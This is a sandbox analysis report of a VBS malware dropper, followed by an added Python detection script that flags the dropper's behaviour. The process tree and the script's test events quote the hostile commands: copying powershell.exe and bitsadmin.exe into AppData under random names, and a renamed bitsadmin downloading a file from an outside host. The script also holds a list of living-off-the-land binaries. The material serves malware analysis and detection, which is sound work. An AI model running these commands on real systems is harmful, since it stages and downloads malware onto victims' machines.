Analysis
- max time kernel: 118s
- max time network: 124s
- platform: windows7_x64
- resource: win7
- submitted: 13-07-2020 07:26

Static task: static1

Behavioral task: behavioral1
- Sample: Fatt_cliente_01557430269.vbs
- Resource: win7 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: Fatt_cliente_01557430269.vbs
- Resource: win10v200430 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: Fatt_cliente_01557430269.vbs
- Size: 4KB
- MD5: 5b96f2ae8a3683b45b13cabbf3a134ee
- SHA1: 57d4d4b4a328628471949a3d434b5993ce6430ba
- SHA256: a0291ef7ae4a775b1ac0a6cf14f58dba8ea3703c41cacc73b64f00f46d053766
- SHA512: f724493f0a1ebdc89ce901e11e30eeb98b82186ae0e748ff2dc80939d2532c6573bdf7e98366b53f568ca8d502a093331779028fe14b5088796f859a4f83e909
- Score: 8/10
Malware Config
Signatures
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes:
  description | pid | process | target process
  PID 1496 wrote to memory of 1616 | 1496 | WScript.exe | cmd.exe
  PID 1496 wrote to memory of 1616 | 1496 | WScript.exe | cmd.exe
  PID 1496 wrote to memory of 1616 | 1496 | WScript.exe | cmd.exe
  PID 1496 wrote to memory of 324 | 1496 | WScript.exe | cmd.exe
  PID 1496 wrote to memory of 324 | 1496 | WScript.exe | cmd.exe
  PID 1496 wrote to memory of 324 | 1496 | WScript.exe | cmd.exe
  PID 1496 wrote to memory of 732 | 1496 | WScript.exe | VWga.exe
  PID 1496 wrote to memory of 732 | 1496 | WScript.exe | VWga.exe
  PID 1496 wrote to memory of 732 | 1496 | WScript.exe | VWga.exe
  PID 1496 wrote to memory of 732 | 1496 | WScript.exe | VWga.exe
- Executes dropped EXE (1 IoC)
  Processes:
  pid | process
  732 | VWga.exe
Processes
- C:\Windows\System32\WScript.exe (PID 1496)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_01557430269.vbs"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe (PID 1616)
    "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zVWga.exe
  - C:\Windows\System32\cmd.exe (PID 324)
    "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\VWga.exe
  - C:\Users\Admin\AppData\Roaming\VWga.exe (PID 732)
    "C:\Users\Admin\AppData\Roaming\VWga.exe" /transfer mTGVIF /download https://mzgotech.com/temha/01557430269/it.gif C:\Users\Admin\AppData\Roaming\it.gif
    Signatures: Executes dropped EXE
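The process tree above shows a three-step chain: the script host runs the VBS, cmd.exe copies the 32-bit powershell.exe and bitsadmin.exe out of SysWOW64 into %AppData%\Roaming under random names (zVWga.exe and VWga.exe), and the renamed bitsadmin copy is then launched with /transfer to download it.gif from mzgotech.com into the same folder. The report records no execution of zVWga.exe and does not show what it.gif contains. The following is an added detection example, not the sandbox vendor's code or anything from the report's raw logs: it runs three rules over constructed Sysmon-style process-creation events that mirror the tree (plus one benign bitsadmin invocation as a control). The rules are a copy of a known living-off-the-land binary from a system directory into a user-writable path, an executed image whose OriginalFileName (from the PE version resource) does not match its on-disk name, and a BITS /transfer /download. The OriginalFileName values and the parent PID of WScript.exe are assumptions; real telemetry should be compared case-insensitively as done here.

```python
"""Detect copy-a-LOLBin-then-run-it chains like the one in the report above.

Added example, not the sandbox vendor's detection code. EVENTS are constructed
Sysmon-style process-creation records that mirror the report's process tree;
OriginalFileName values and the WScript.exe parent PID are assumptions.
"""
import re
from dataclasses import dataclass

LOLBINS = {"bitsadmin.exe", "powershell.exe", "certutil.exe", "mshta.exe",
           "rundll32.exe", "regsvr32.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed input (not the sandbox's raw logs); the command lines are those
# shown in the report, the last record is a benign control.
EVENTS = [
    {"pid": 1496, "ppid": 988, "image": r"C:\Windows\System32\WScript.exe",
     "original_file_name": "wscript.exe",
     "command_line": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_01557430269.vbs"'},
    {"pid": 1616, "ppid": 1496, "image": r"C:\Windows\System32\cmd.exe",
     "original_file_name": "Cmd.Exe",
     "command_line": r'"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zVWga.exe'},
    {"pid": 324, "ppid": 1496, "image": r"C:\Windows\System32\cmd.exe",
     "original_file_name": "Cmd.Exe",
     "command_line": r'"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\VWga.exe'},
    {"pid": 732, "ppid": 1496, "image": r"C:\Users\Admin\AppData\Roaming\VWga.exe",
     "original_file_name": "bitsadmin.exe",
     "command_line": r'"C:\Users\Admin\AppData\Roaming\VWga.exe" /transfer mTGVIF /download https://mzgotech.com/temha/01557430269/it.gif C:\Users\Admin\AppData\Roaming\it.gif'},
    # Benign control: the real bitsadmin, run from its normal path, listing jobs.
    {"pid": 2040, "ppid": 1200, "image": r"C:\Windows\System32\bitsadmin.exe",
     "original_file_name": "bitsadmin.exe", "command_line": r"bitsadmin /list"},
]

# "copy [/flags] <src> <dst>" (the /Z restartable-mode flag in the report is just one such flag)
COPY_RE = re.compile(r'\b(?:copy|xcopy)\b(?:\s+/\S+)*\s+(?P<src>"[^"]+"|\S+)\s+(?P<dst>"[^"]+"|\S+)', re.I)
SYSTEM_DIR_RE = re.compile(r'^[a-z]:\\windows\\(?:system32|syswow64)\\', re.I)
USER_WRITABLE_RE = re.compile(r'\\(?:appdata|users\\public|programdata|temp)\\', re.I)
URL_RE = re.compile(r'https?://\S+', re.I)


@dataclass(frozen=True)
class Alert:
    rule: str
    pid: int
    detail: str


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path, quotes stripped."""
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def scan(events):
    """Apply the three rules to a list of process-creation events; return Alerts."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        image = _base(e["image"])
        orig = e["original_file_name"].lower()
        parent = by_pid.get(e["ppid"])
        note = ""
        if parent and _base(parent["image"]) in SCRIPT_HOSTS:
            note = f" (spawned by script host {_base(parent['image'])} pid {parent['pid']})"

        # Rule 1: cmd.exe copying a LOLBin from a system dir into a user-writable path.
        if image == "cmd.exe":
            m = COPY_RE.search(e["command_line"])
            if m:
                src, dst = m["src"].strip('"'), m["dst"].strip('"')
                if SYSTEM_DIR_RE.match(src) and _base(src) in LOLBINS and USER_WRITABLE_RE.search(dst):
                    alerts.append(Alert("lolbin_copied_to_user_path", e["pid"], f"{_base(src)} -> {dst}{note}"))

        # Rule 2: the PE says it is a LOLBin but the file on disk is called something else.
        if orig in LOLBINS and image != orig:
            alerts.append(Alert("renamed_lolbin_executed", e["pid"], f"{e['image']} is really {orig}{note}"))

        # Rule 3: any bitsadmin (renamed or not) used to pull a file down.
        cl = e["command_line"].lower()
        if orig == "bitsadmin.exe" and "/transfer" in cl and "/download" in cl:
            url = URL_RE.search(e["command_line"])
            dst = e["command_line"].split()[-1]
            alerts.append(Alert("bits_download", e["pid"], f"{url.group(0) if url else '?'} -> {dst}{note}"))
    return alerts


if __name__ == "__main__":
    for a in scan(EVENTS):
        print(f"[{a.rule}] pid={a.pid} {a.detail}")
```

Rule 2 is the one that survives the renaming trick on its own: whatever the dropped copy is called, Sysmon event 1 still reports the OriginalFileName from the binary's version resource, so a bitsadmin.exe or powershell.exe running under any other name is an alert regardless of the command line. Rule 1 catches the staging step even if the copy is never executed (as with zVWga.exe in this run), and rule 3 keys on the BITS download itself.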